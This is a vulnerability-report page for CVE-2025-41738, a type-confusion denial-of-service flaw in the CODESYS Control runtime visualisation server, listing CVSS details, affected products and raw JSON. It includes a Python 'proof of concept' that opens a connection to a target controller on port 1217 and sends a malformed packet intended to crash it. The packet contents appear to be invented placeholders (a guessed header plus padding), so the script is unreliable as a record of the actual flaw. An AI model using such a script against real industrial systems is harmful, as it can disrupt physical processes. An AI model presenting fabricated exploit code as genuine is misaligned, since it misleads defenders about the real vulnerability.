Security Vulnerability Report
CVE-2025-41738 CVSS 7.5 HIGH

CVE-2025-41738

Published: 2025-12-01 10:16:01
Last Modified: 2026-02-23 15:42:31

Description

An unauthenticated remote attacker may cause the visualisation server of the CODESYS Control runtime system to access a resource with a pointer of wrong type, potentially leading to a denial-of-service (DoS) condition.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:codesys:control_for_beaglebone_sl:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:codesys:control_for_empc-a\/imx6_sl:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:codesys:control_for_iot2000_sl:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:codesys:control_for_linux_arm_sl:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:codesys:control_for_linux_sl:*:*:*:*:*:*:*:* - VULNERABLE
CODESYS Control (refer to the official advisory for specific versions)
CODESYS Control runtime system (all affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-41738 PoC - CODESYS Control Visualisation Server DoS
# Target: CODESYS Control runtime system visualisation server
# Attack: Send malformed request causing type confusion
import socket
import struct
import sys

def create_malformed_packet():
    # Construct a malformed packet that triggers type confusion
    # This is a simplified example - actual exploitation may require protocol-specific crafting
    header = b'\x03\x00'  # CODESYS protocol header
    packet_type = b'\x0a\x00'  # Visualisation request type
    # Malformed data causing type confusion
    malformed_data = b'\x41' * 100  # Padding with specific pattern
    # Craft the complete packet
    packet = header + packet_type + malformed_data
    return packet

def exploit_cve_2025_41738(target_ip, target_port=1217):
    print(f"[*] Targeting {target_ip}:{target_port}")
    print(f"[*] Exploiting CVE-2025-41738: CODESYS Control Visualisation Server DoS")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        # Send malformed packet
        packet = create_malformed_packet()
        sock.send(packet)
        print(f"[+] Malformed packet sent successfully")
        print(f"[*] Target may crash or become unresponsive")
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 1217
    exploit_cve_2025_41738(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41738", "sourceIdentifier": "[email protected]", "published": "2025-12-01T10:16:01.130", "lastModified": "2026-02-23T15:42:30.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated remote attacker may cause the visualisation server of the CODESYS Control runtime system to access a resource with a pointer of wrong type, potentially leading to a denial-of-service (DoS) condition."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_beaglebone_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "AC30C449-D8D5-4789-875B-770BA22CB50A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_empc-a\\/imx6_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndIncluding": "4.19.0.0", "matchCriteriaId": "A00DF2DC-04B9-498C-9AF0-1205A45A104C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_iot2000_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "C245753D-52F6-4B11-8724-8DC05C7149F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_linux_arm_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": 
"4.19.0.0", "matchCriteriaId": "4B16CF88-9B70-4B28-92AB-F5CD49ADE513"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_linux_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "9D4B874C-2402-4208-85B8-EBC03D092678"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_pfc100_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndIncluding": "4.19.0.0", "matchCriteriaId": "B0B3369D-A9E4-4362-8A2B-947C6B89C4A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_pfc200_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "BA58388A-4084-47CB-8078-2B3405DA3D95"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_plcnext_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "15F6992D-80C0-43FE-AFD3-241F1F44B078"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_raspberry_pi_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "9F9F69C3-3C0A-4D08-94EE-C9FFD21FD89E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_wago_touch_panels_600_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndIncluding": "4.19.0.0", "matchCriteriaId": "53BE2A4B-940C-499C-854F-CD8B99FD4EB5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_rte_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "E36769BE-B465-450C-B584-075E969CE608"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_rte_sl_\\(for_beckhoff_cx\\):*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "D8CCA570-A3CE-46CF-BBD1-384DFBD8DA4C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_win_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": 
"3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "827EB8A7-01B0-4414-A20C-6B2FABF9E384"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:hmi_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "897A1436-7A4E-4AF2-8A62-77DA592321F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:remote_target_visu:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "4E7C54E1-5F4B-4436-BEF7-F86EB783D1F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:runtime_toolkit:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "C5DC5E0B-5D9A-4A6D-8894-97EF707151EF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:virtual_control_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "492FCFE5-1A20-494D-A872-A5FAF463EE30"}]}]}], "references": [{"url": ... (truncated)